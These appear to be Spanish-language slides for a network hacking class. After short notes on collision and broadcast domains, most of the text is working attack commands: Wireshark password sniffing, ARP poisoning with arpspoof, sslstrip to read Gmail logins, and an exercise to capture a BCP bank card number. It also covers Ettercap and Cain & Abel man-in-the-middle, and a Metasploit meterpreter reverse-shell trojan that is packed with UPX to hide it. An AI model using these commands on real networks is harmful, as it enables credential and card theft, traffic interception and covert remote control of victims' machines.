Conceptos Generales

Una colisión en ethernet es el resultado, de dos nodos que transmiten de forma simultanea. Las tramas chocan y se dañan

cuando se encuentran en el medio físico. Un dominio de colisión en ethernet es el área de la red dentro del cual las tramas que ha

sufrido colisiones se propagan.

Un Broadcast es un paquete de datos que se envían a todos los nodos de la red. Los broadcast se identifican a través de una

dirección de broadcast. Dominio de Broadcast es un conjunto de todos los dispositivos que reciben tramas de broadcast que se

originan en cualquier dispositivo del conjunto.

Switching (switch capa 2!)✔Dominio de Colisión✔ Bridge multipuerto

✔Decisiones de envío de datos en base a la dirección MAC destino contenida en cada frame.

Router (switch capa 3!)✔Dominio de Broadcast

✔Crear y mantener una tabla de enrutamiento de cada protocolo de la capa de red.

✔Identificar el protocolo contenido en cada paquete, extraer la dirección destino de la capa de red y enviar los datos en base a la

decisión de enrutamiento.

Sólo una entidad de Capa 3, como un router o una LAN virtual (VLAN), puede detener un

dominio de broadcast de Capa 3. Los routers y las VLAN se utilizan para segmentar los dominios

de colisión y de broadcast.

Wireshark

conseguir pass http (wiresharkhttp): Follow TCP Stream

www.cinemark-peru.com

-> protocolos no seguros!!!!Haganlo Uds! (15 minutos)

Wireshark

conseguir pass ssh? (wiresharkssh): Follow TCP Stream

Wireshark

($ sudo apt-get install wireshark)

Sniffing! :)wget http://192.168.14.100/cb/CSWAE.pdf

Comparar teoria TCP/IP con Wireshark

conseguir pdf (wiresharkpdf): Follow TCP Stream

Haganlo Uds: (15 minutos)

Wireshark

wget http://192.168.14.100/cb/cb.pcap

QUE ES?

envenamiento arp -> arpspoof

arp -asolo dominio de broadcast!!!

$ sudo apt-get install dsniff

Windows:ping x.x.x.x

arp -a

Kali:cat /proc/sys/net/ipv4/ip_forward

echo "1" > /proc/sys/net/ipv4/ip_forward(hacer que el tráfico fluya por nuestro ordenador)

cat /proc/sys/net/ipv4/ip_forward

arpspoof -i eth0 -t 192.168.14.130 192.168.14.1arpspoof -i eth0 -t 192.168.14.1 192.168.14.130

arp -a en el windows (comparar)

Haganlo Uds! (combinen arpspoof y wireshark para los ejemplos de la primera parte, 30 minutos)

Qué más?

apt-get install driftnetdriftnet -i eth0 -v

wireshark http (png) ->file – export object – http

(ip.src == 192.168.0.3 || ip.dst == 192.168.0.3) && http.request(ip.src == 192.168.0.3 || ip.dst == 192.168.0.3) &&

http.request.method == “POST”

Qué más?

sslstrip

iptables --t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 (redirigir todo lo que va por el puerto

80 hacia el 10000, que es donde sslstrip escucha)iptables -t nat -L

sslstrip -l 10000

sslstrip y arpspoof para ver pass https://mail.google.comwireshark -> login

(alumnos: combinen sslstrip y arpspoof para ver número de tarjeta de bcp - 20 minutos)

Qué más?

ettercap –GSniff--->Unified Sniffing

Hosts---> Scan for hostsHost--->Hosts list

Seleccione el Destino 1 (Víctima) y el Destino 2 (router, para poder “sniffear” todo el tráfico entre ellos.

Mitm--->Arp poisoningStart--->Start Sniffing

Qué más?

cain & abelStart sniffer (icono verde arriba a la izquierda)

Tab sniffer – select hostsClick derecho – Scan mac address

Select APRAPR

Add to listStart APR

Qué más?

Spoofing IP (syn flood) -> filtrar ips ingreso fwSpoofing Web (web falsa!) -> educación

Spoofing DNS (dns falso!) -> asegurar server

Virus?

msfpayload windows/meterpreter/reverse_tcp lhost=192.168.14.xx lport=443 X > troyano.exe

Virus?

levantar console con handlemsfcli exploit/multi/handler

PAYLOAD=windows/meterpreter/reverse_tcp lhost=192.168.14.1xx lport=443 E

meterpreter:ifconfigroutepwd

(haganlo uds mismos! 30 minutos)

Virus?

“Instalen” UPX en Kali:http://upx.sourceforge.net/

Virus?

tar -xjvf upx-3...

Virus?

msfpayload windows/meterpreter/reverse_tcp lhost=192.168.14.xx lport=443 X > troyano.exe

./upx -5 troyano.exe -o oculto.exe